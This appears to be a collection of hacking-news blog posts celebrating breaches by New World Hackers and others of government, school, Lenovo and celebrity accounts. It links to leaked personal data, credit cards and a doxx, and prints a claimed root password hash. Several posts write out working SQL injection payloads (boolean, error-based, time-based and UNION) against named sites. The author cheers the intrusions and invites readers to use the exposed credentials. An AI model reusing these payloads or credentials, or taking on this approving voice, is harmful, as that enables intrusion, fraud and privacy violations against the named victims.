OurMine & Qurlla of New World Hackers Team Up To Hijack Twitter Accounts Belonging To International Celebrities

After taking a brief break away from the hacking scene over recent months, it appears as though the “OurMine” hacking gang and “Qurlla” of New World Hackers are making a comeback of sorts – at least momentarily. I say this because last night, both groups teamed up together to hack the social accounts belonging to Shiamak Davar, a famous international choreographer making his home in India, but with multiple Twitter accounts/handles across the US and Europe.

While one of his accounts was hacked and erased to feature the logo and name of OurMine, a separate account hijacked by Qurlla has essentially become his new de facto Twitter account – instantaneously giving him access to well over 53,000 fans internationally, lulz. To this effect, in the time since first hacking the accounts a little over 24 hours ago, Qurlla has been using the account to post a brief bio about himself, as well as to release samples of all his most recent hacks/leaks – whilst also monitoring all of Davar’s incoming notifications/messages. You can see this information and more, along with access to the hacked account via the information provided below – enjoy!

https://twitter.com/Qurlla/status/1119091622275207168

Screen Shots of Hacked Accounts:

No photo description available.

No photo description available.

Servers Belonging To Vermont’s Department of Financial Regulation Rooted, 41.48 Megabytes of Data Leaked Online

Late last night, January 27th 2019, a French based hacker belonging to the New World Hackers group going by the name of “Mizaru” announced a data dump of Vermont’s Department of Financial Regulation. The leak itself is too big to possibly explain in a couple of brief sentences here, but what I can report on is that approximately 41.48 Megabytes (MB) of data comprising of PHP Version: 5.6.15 files hosted on a 10.1.9-MariaDB database were hacked/leaked online, and that the departments servers were hacked via SQL vulnerabilities tied to URL’s addresses attached to the website back-end.

Included in the leak is information tied to various banks affiliated with the Government of Vermont, including their unique ID’s, code numbers, license numbers, issuance date, company name, trade name and addresses. The leaked data also includes access to state registration files, along with the hashed passwords necessary to access them, as well as full copies of internal memos, emails, documentation and much more. Honestly, the leak is so big that it’s almost impossible to summarize all at once here, so you are just going to have to browse through the leak for yourself this time.

Site: hxxp://dfr.vermont.gov/
Location of SQL Database Dump: http://dfr.vt.gov/bishcain_drupal.sql
Download Site Databases (41.48 MB): https://anonfile.com/o983S6r4b8/dfr.vt.gov_txt

https://twitter.com/MZR_h4x0r/status/1089617826284032001

India’s Jamal Mohamed College Hacked by New World Hackers, Student Email Archives Dumped Online

Two nights ago, January 25th 2019, a member of the New World Hackers group going by the name of “Mizaru” claimed responsibility for the hack of Jamal Hohamed College in Khajanagar, Tiruchirappalli – India. Comprising of over 3,200 lines, this is one of the largest data leaks I have ever seen Mizaru publish. This is also because it contains the personal email messages/exchanges of hundreds of students, as well as a full database of university staff members – including their full names, positions, emails and contact information. On top of having their emails exposed, the hackers also managed to uncover and release even more student data, including their course catalogs, contact information and home addresses.

Browsing through the leak, Mizaru also made it quite clear that they were originally able to compromise the website via SQL Injection, granting administrator level access/privileges over the entire site.

Target: hxxps://www.jmc.edu/
Data Leak: https://ghostbin.com/paste/96eg8

https://twitter.com/MZR_h4x0r/status/1088943913161932800

Kementerian Energi dan Sumber Daya Mineral Republik Indonesia & Sistema de Gestión SUMAR Hacked by New World Hackers

No photo description available.

Yesterday morning, January 23rd 2019, two new members of New World Hackers going by the name of “Mizaru” and “Ftp” announced the hack and leak of two international Government agencies/departments. More specifically, the Ministry of Energy and Mineral Resources of The Republic of Indonesia (ESDM) and a branch of the Argentinian Ministry of Health known as Sistema de Gestión (SUMAR) were compromised by the breaches.

Once again however, just as with their hacks earlier this week, the leaked data is somewhat unconventional. Meaning that instead of leaking any data or information contained within the hacked databases, the hackers have instead chosen to leak the various SQL vulnerabilities used to compromise the databases in the first place – essentially showing others how the hack was physically pulled off for them to replicate, or for site administrators to patch.

Ministry of Energy and Mineral Resources: hxxp://tpdk.esdm.go.id
Vulnerabilities Leak: https://ghostbin.com/paste/kc6jo

Sistema de Gestión (SUMAR): hxxp://plannacer.larioja.gov.ar/
Vulnerabilities Leak:

https://twitter.com/MZR_h4x0r/status/1088037279627649024

https://twitter.com/MZR_h4x0r/status/1088112570421129216

Al1ne3737 & Mizaru Hack, Leak and/or Deface 6 Municipal Government Websites Across Brasil

No photo description available.

To close out the work week, over the course of the last 48 hours various members belonging the “New World Hackers” group announced the hack and/or leak and/or defacement of 8 websites across Brasil. To be more specific, implicated in the hacks/leaks featured below are the Town Hall of Pedra Azul, Municipal Town Hall of Tocos do Moji, Municipal Town Hall of Solidao, Municipal Town Hall of Bezzerros, Municipal Town Hall of São José da Coroa Grande, the Intermunicipal Consortium of Environmental Sanitation – Midwest division, CÂMARA DE VEREADORES DE MATO CASTELHANO and the Municipal Water and Sewage Service of São Leopoldo (SEMAE). Two New World Hackers known as “Al1ne3737” and “Mizaru” have claimed responsibility for the breaches.

Exposed within the hack of CÂMARA DE VEREADORES DE MATO CASTELHANO are login user names and passwords of two website administrators, granting access to two site databases containing information on site users, including telephone numbers, addresses, website user names and passwords – etc. In addition to the hack/leak, the website was also defaced. In fact, as of the evening hours of January 25th 2019, the website still remains in its defaced position. Additionally, in a message attached to the hack, “Al1ne3737” stated “The voice of none is stronger than the voice of one. Your website has been hacked because your security is very week. Your website is vulnerable to SQL Injection, so please fix.

Alvo: hxxp://camaramatocastelhano.rs.gov.br/
Leak: https://ghostbin.com/paste/7zqj8
Deface: http://www.zone-h.org/mirror/id/32159540?hz=1

Screen Shot of Deface:

No photo description available.

Exposed in the leak of the Consórcio Intermunicipal de Saneamento Ambiental – Meio Oeste are the login emails addresses and passwords of 3 website administrators, granting full access to the websites back-end – including 3 site databases. In a message attached to the hack, “Al1ne3737” sarcastically asked the rhetorical question “Do I Look Like Someone Who Has A Plan?” The website itself was also defaced and as of the evening hours of January 25th 2019, still remains in its defaced condition. A screen shot of the deface is provided below.

Alvo: hxxp://cisam.sc.gov.br/
Leak: https://ghostbin.com/paste/m3htj
Deface: http://www.cisam.sc.gov.br/leis/al1ne3737.html

Screen Shot of Deface: 

No photo description available.

Most notably implicated in the leak of the Prefeitura de Pedra Azul are the user names, passwords and email addresses of 10 website administrators, including the sites Head Web Master – granting full access to the back-end of the website and all of its contents.

Alvo: hxxp://www.pedraazul.mg.gov.br/
Leak: https://ghostbin.com/paste/h3k6o

Exposed in the leak of Prefeitura Municipal de Tocos do Moji are the login user names and password of two site administrators, once again offering full access to the back-end of the website and all of its content. The email addresses and Federal CPF numbers of 5 other administrators can also be found in the leaked data provided below.

Alvo: hxxp://www.tocosdomoji.mg.gov.br/
Leak:  https://ghostbin.com/paste/6pu5f

Exposed in the leak of the Prefeitura Municipal de Solidão are the personal email addresses and encrypted passwords of 19 politicians used to login into their official Government accounts through the municipalities online web portal.

Alvo: hxxp://solidao.pe.gov.br/
Leak: https://ghostbin.com/paste/wq6k5

Exposed in the leak of the Prefeitura Municipal – Prefeitura de Bezerros are the user names and passwords of two site administrators, granting access to a singular site database attached to the websites back-end containing information on all of the sites PHP files, as well as other miscellaneous information.

Alvo: hxxp://www.bezerros.pe.gov.br/
Leak: https://ghostbin.com/paste/oyeyb

Exposed in the leak of the Prefeitura Municipal de São José da Coroa Grande are the usernames and passwords of 6 website administrators, granting access to a singular database containing information such as internal user logs, notices, calendars, telephone numbers – etc.

Alvo: hxxp://www.saojosedacoroagrande.pe.gov.br/
Leak: https://ghostbin.com/paste/rc8uz

Exposed within a hack of the Serviço Municipal de Água e Esgotos de São Leopoldo (SEMAE) are the emails, usernames and passwords of 5 website administrators, granting access to a database containing all of the companies online information, including contacts, customer/clients lists and internal documents/memos.

Alvo: hxxp://www.semae.rs.gov.br/
Leak: https://ghostbin.com/paste/cnn6j

Browse Through All The Leaks:

[pdf-embedder url=”https://roguemedia.co/wp-content/uploads/2019/01/NWH_Leaks.pdf”%5D

https://twitter.com/al1ne3737/status/1088480825287626755

https://twitter.com/al1ne3737/status/1088362937595691008

Hacker Doxx’s Suspect To Avenge Leak of Brasilian Federal Police

In a move I have honestly never seen before, a hacker going by the name of “Sharp3” has managed to uncover the identity of another hacker going by the name of “Tr3v0r” – whom was responsible for a hack and data leak effecting the Brasilian Federal Police earlier this morning. Not only this, but Sharp3 also personally took it upon himself to assemble screen shots of the leaked data, proof of authorship that Tr3v0r first hacked and leaked the information, as well as personal pictures exposing his real life identity. Sharp3 then complied the entirety of the information and loaded it onto a custom domain – see below – and hand delivered the information to inbox’s of each of the 249 police officers exposed by this mornings data breach – lulz.

It should go without saying, but this is a doxx the likes of which no one has ever seen before – which is what makes it news worthy here today. It also adds to a recent trend over the last 3 weeks or so, of different hackers being exposed by other hackers. For example, Sh4rpShooter of Pryzraky, Shizen of New World Hackers and Mr. Attacker of AnonGhost have all been exposed by rival hackers within the course of the last two weeks alone.

Website Featuring Doxx of Tr3v0r: https://www.inocent.com.br/uploads/tr3v0r.php

Screen Shot from Doxx:

No photo description available.

 

Qurlla of New World Hackers Begins Infecting IoT Devices with New, Never Before Seen, TrojanXENE Ransomware

This morning, January 14th 2019, “Qurlla” of New World Hackers essentially launched/invented a new form of ransomware attack that the world has never seen before. Unlike traditional ransomware attacks which first require a user to click on a hyperlink and/or download a file, this ransomware is being spread via open ports on devices located on the Internet of Things (IoT).

Traditionally, the IoT has been used to build botnets for Bitcoin mining or DDoS attacks, essentially using malware to crawl different network systems on the IoT to infect any vulnerable devices on it. However, Qurlla appears to have coded a new piece of malware that scans vulnerable devices on the Internet of Things, injecting open ports built into their software directly with the ransomware itself – requiring no action from the device or its user whatsoever. Essentially, these devices are being infected simply by just existing dormantly on the IoT – something which, at least to my knowledge, no one has ever pulled off before.

https://twitter.com/Qurlla/status/1084880048799342596

To date, Qurlla claims to have compromised approximately 214,003 devices through a web service known as Shodan, the self described “Search Engine for The Internet of Things,” infecting at least 150,000 with his ransomware – including TV’s, laptops, PC’s and Raspberry Pi servers. He has also targeted Amazon Echo devices, printers and cell phones as well. In statements to Rogue Media Labs, Qurlla explained that this only the beginning, and he is still actively developing his source code – which will remain private until at least next month. For the time being, Qurlla is going to keep building upon his code – perhaps introducing a DDoS variant into the mix, allowing for infected devices to coordinate with one another to carry out DDoS attacks in the future.

While it is still very early and the attack was just launched a few hours ago, Qurlla says that he has already made over $300 from infected victims – asking $150 a piece to decrypt his ransomware. Qurlla calls his new ransomware “TrojanXENE,” a custom coded trojan which uses Ruby code to send TCP payloads and header redirects from a Google API – effecting devices found on on Shodan, using their API to send the payloads to get a response. To exploit the printers, Qurlla used CastHack source code from “HackerGiraffe,” modifying the payloads to deliver his variant.

Qurlla details that he uses a “simple SHA-1” to encrypt the devices, “but every payload is tweaked to pull off the attack” – depending on the type of device compromised. He explains how he “did code like a gui in C# earlier, but it wasn’t as efficient as just executing python commands in terminal to make this possible. There is really a mix of programming languages.” Upon turning on or accessing their device, users are greeted with a message stating that “You got Hacked” – which then redirects them to a BTC payment gateway. Reportedly, users are not allowed to do anything on their devices until a payment of $150 is made. Below is a screen shot of the messages left behind on infected devices.

Screen Shot from Infected IoT Device:

Image may contain: one or more people and text

https://twitter.com/Qurlla/status/1084839749746126849

Batticaloa Municipal Council of Shri Lanka Hacked, Site Databases Leaked Online

Shortly after new year’s 2019, hackers “Shizen” and “Ftp” announced a hack of the Batticaloa Municipal Council in Sri Lanka. While the leak contains some 760 lines, most notably within it, hackers were able to uncover the personal information of 22 website administrators, including their usernames, email addresses, phone numbers and full passwords – theoretically granting anyone access to the back end of the website. Also included in the leaked databases is personal information on 100 Municipal Council members, including their full names, addresses, emails, ID numbers, passwords, phone numbers and usernames.

Website Effected: hxxp://batticaloa.mc.gov.lk
Raw Leak: https://ghostbin.com/paste/r5s4d

Examples:

No automatic alt text available.

No automatic alt text available.

https://twitter.com/__sh1z3n/status/1080216837873459201

East Sac Community School District Hacked, Databases Leaked Online

Last night “Shizen and “Ftp of New World Hackers announced a hack of East Sac Community School District in Lake View, Iowa, allowing the group to gain remote access to several site databases before compiling and ultimately dumping the information online. In a press release made available to the public through Ghostbin, Shizen explains how they were able to hack the website through various SQL Injections, granting them access to PHP 5.6.23 files hosted in a MySQL database on the Nginx web server of a WordPress website.

Parameter: id (GET)

Target: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=7 AND 1973=1973

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY, or GROUP BY clause (FLOOR)
Payload: id=7 AND (SELECT 4390 FROM SELECT COUNT(*), CONCAT(0x7170716271, (SELECT (ELT(4390=4390,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.P LUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND te-based blind
Payload: id=7 AND SLEEP(5)

Exposed within the leak are the exact vulnerabilities effecting the site, the payloads delivered to compromise it, as well as the root admin username and password. You can also find the contact information of various school employees/administrators, including full names, positions, email addresses and phone numbers, as well as the login user names, emails and hashed passwords of various site administrators.

Website Hit: hxxp://eastsac.k12.ia.us/
Raw Leak: https://ghostbin.com/paste/hwpf2

https://twitter.com/__sh1z3n/status/1079928590517657601?s=19

Lenovo Website Servers Haxxed, Data of +1 Million Users Compromised by New World Hackers

Just before the new year broke, Eastern Standard Time, “Qurlla” of New World Hackers announced a major leak of Lenovo web servers, releasing what was perhaps the single largest data dump I have ever seen. According to the hackers behind the leak, even after the initial leak was posted online downloads from the website were still ongoing.

According to Qurlla, Lenovo’s web servers were originally compromised via SQL injection off of an outdated product ID number. Meaning that the hackers were able to find a product ID online which accidentally led them to an error page. Then, using this error page, hackers proceeded to enter a series of query strings ultimately granting them full administrator level access over the website and all its contents – allegedly over 20 GB of data.

According to the estimates of hackers involved in the breach, over 127,000 customers were effected and over 1 million registered users exposed. Browsing through different tables attached to the leaks, you can find information such as payment providers and plans, access to the websites video files, chatroom and registered email users, as well as their email exchanges/messages with Lenovo staff. You can find the shipping addresses of customers, order numbers, password history, customer account login information, mailing lists and much more. You can even find a list of IP Addresses blacklisted by the website, nearly 2,000 lines of data in total – composing of access to dozens of databases and hundreds of folders/tables.

Database IP: 66.147.244.90

Website Login: https://lenovo.com/us/en/login
Root Login Username: Lenovo
Password: 070928ee0c13fa61708001bda30fff23

Database Download (27.03 KB): https://anonfile.com/A2sfxapab2/dumps.txt_zip
Credit Card’s Stolen: https://ghostbin.com/paste/3nh4x

https://twitter.com/Qurlla/status/1079919133930737664?s=19

Texas.gov & Florida.gov Hacked by New World Hackers, Access To Various Databases Leaked Online

This afternoon, December 31st 2018, “Qurlla” of New World Hackers announced the breach of two databases tied to the States of Florida and Texas. The first hack targeted the state website of Florida, exposing information of what appears to either be various state contractors or employees, including their names, addresses, emails and phone numbers – roughly 1,066 lines of data. The second leak effected the state website of Texas and contains much more detailed/sensitive information, including 83 website administrators full names, email addresses, user login names and passwords. Additional information leaked from the site exposes access to the sites user database contents, as well as video files.

In a message to Rogue Media Labs, Qurlla explained how his group was able to hack both the websites via SQL Injection, presumably through a vulnerability tied to the sites back end. However, the exact URL’s effected or payloads delivered were not disclosed online. Additionally and perhaps most importantly, Qurlla did tag the states of Texas and Florida in the leak, meaning that there is no discernible timetable as to how long the credentials exposed online will remain valid – if you were interested in poking around, that is 😉.

Websites Targeted:

hxxp://texas.gov/
hxxp://florida.gov/

Texas.gov Leak: https://ghostbin.com/paste/ceeom
Florida.gov Leak: https://ghostbin.com/paste/zaq2y

https://twitter.com/Qurlla/status/1079827887610626048

https://twitter.com/Qurlla/status/1079760430703280128

Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, managing to leak the contents of databases tied to the Hematology and Hemotherapy Center of Piaui online. Having covered Shizen many times throughout the past, this appears to be the first hack carried out under the banned of New World Hackers, after previously conducting hacks on behalf of Pryzraky – perhaps indicating a change of teams or allegiances. 

Regardless, to serve as proof of the hack, in a data dump posted to Twitter this morning, the hackers posted a mirror of the sites contents – 21 different databases in all. Analyzing the hack, it appears as though the group was able to gain remote access to site databases through a multitude of SQL vulnerabilities left unaddressed by site security architects, ultimately granting hackers access to PHP 5.3.3 files, attached to a MySQL 5.0 Database hosted on an Apache 2.2.16 web server. In another surprise move, Shizen even released the exact vulnerabilities effected and payloads delivered within the framework of the leak itself – something normally redacted or kept private.

For Example, Here are The 4 SQL Vulnerabilities Implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=13′ AND 7214=7214 AND ‘aWjt’=’aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13′ AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘lEbP’=’lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13′ AND SLEEP(5) AND ‘ouoQ’=’ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=13′ UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)– EKMl

Raw Database Leak: https://ghostbin.com/paste/6w4ok

Image may contain: text

https://twitter.com/__sh1z3n/status/1079589738355531777